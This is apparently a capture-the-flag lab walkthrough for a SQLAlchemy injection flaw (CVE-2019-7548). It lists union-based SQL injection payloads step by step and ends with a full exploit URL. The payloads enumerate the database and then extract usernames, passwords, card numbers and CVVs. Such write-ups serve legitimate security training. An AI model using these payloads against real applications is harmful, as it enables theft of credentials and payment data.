Post

IML - CVE-2019-7548 (SQLAlchemy)

CVE-2019-7548 (SQLAlchemy) - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

Posted Updated
By Trompie
1 min read

IML - CVE-2019-7548 (SQLAlchemy)

image1

  • Firstly we can see that there is a parameter that might be vulnerable to SQLi

  • To test it, we can use a ‘ to break it

image2

  • From here I use the order by query to find out how many columns the table has (trial and error)
  • It errors at 9 so the table has 8 columns

image3

  • Now we can do union select 1,2,3,4,5,6,7,8 because the UNION has to have the same number of columns as the current table
  • It was trial and error to find where the values were being reflected but I found it on the last page (221)

image4

  • Now we know where it is being reflected, we can get some information

  • First find the type of DB and version:

1
2

union select 1,2,3,4,5,6,7,@@version

image5

image6

  • Answering the questions:

image7

  • First let’s get the database name - and because it’s MariaDB we use:
1
2

database()

image8

image9

  • We can now enumerate the tables with:
1
2

union select 1,2,3,4,5,6,7,group_concat(table_name) from information_schema.tables where table_schema="website"

image10

image11

  • From here we get the tables transactions and users

  • First let’s enumerate the table users:

1
2

union select 1,2,3,4,5,6,7,group_concat(column_name) from information_schema.columns where table_name="users"

image12

image13

  • Here we get the columns id,firstName,lastName,country,username,email,password,cardNumber,cardIssuer,cardExpiry,cardCVV

  • To read the columns we do:

1
2

union select 1,2,3,4,5,6,7,group_concat(username,0x2b,password) from users

This will read and concat the two columns: username and password. The 0x2b is a delimeter to make it more easily readable

image14

image15

  • To narrow it down do:
1
2

union select 1,2,3,4,5,6,7,group_concat(username,0x2b,password) from users where username="ywalsh"

image16

image17

  • Use the following:
1
2

union select 1,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardNumber) from users where lastname="Park" and firstName="Shelly"

image18

  • Use the following:
1
2

union select 1,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardCVV) from users where lastname="Elliott" and firstName="John"

image19

image20

Full URL for this is:

http://10.102.16.9/?page=221&group=email%20union%20select%201,2,3,4,5,6,7,group_concat(firstName,lastName,0x2b,cardCVV)%20from%20users%20where%20lastname=%22Elliott%22%20and%20firstName=%22John%22

CTF, ImmersiveLabs
john the ripper privilege escalation rce sqli
This post is licensed under CC BY 4.0 by the author.